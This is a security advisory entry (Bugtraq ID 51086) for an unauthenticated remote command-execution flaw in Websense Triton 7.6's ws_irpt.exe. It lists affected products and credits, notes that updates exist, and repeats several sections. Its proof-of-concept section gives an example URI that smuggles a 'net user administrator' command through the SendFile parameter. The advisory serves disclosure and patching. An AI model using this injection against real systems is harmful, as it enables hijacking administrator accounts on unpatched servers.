Websense Triton 'ws_irpt.exe' Remote Command Execution Vulnerability
BID:51086
Info
Websense Triton 'ws_irpt.exe' Remote Command Execution Vulnerability
| Bugtraq ID: | 51086 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 15 2011 12:00AM |
| Updated: | May 02 2012 07:11AM |
| Credit: | Ben Williams of NGS Secure Research |
| Vulnerable: |
Websense Web Security Gateway Anywhere 7.6 Websense Web Security Gateway 7.6 Websense Web Security 7.6 Websense Web Filter 7.6 |
| Not Vulnerable: | |
Discussion
Websense Triton 'ws_irpt.exe' Remote Command Execution Vulnerability
Websense Triton is prone to a remote command-execution vulnerability.
An attacker can exploit this issue to execute arbitrary commands with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
Websense Triton is prone to a remote command-execution vulnerability.
An attacker can exploit this issue to execute arbitrary commands with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
Exploit / POC
Websense Triton 'ws_irpt.exe' Remote Command Execution Vulnerability
The following example URI is available:
https://www.example.com/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user administrator blah|
The following example URI is available:
https://www.example.com/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user administrator blah|
Solution / Fix
Websense Triton 'ws_irpt.exe' Remote Command Execution Vulnerability
Solution:
Updates are available. Please see the references for details.
Solution:
Updates are available. Please see the references for details.
References
Websense Triton 'ws_irpt.exe' Remote Command Execution Vulnerability
References:
References:
- Websense Homepage (Websense)
- websense Hotfix (websense)
- NGS00140 Patch Notification: Websense Triton 7.6 - Unauthenticated remote comm (Research@NGSSecure
)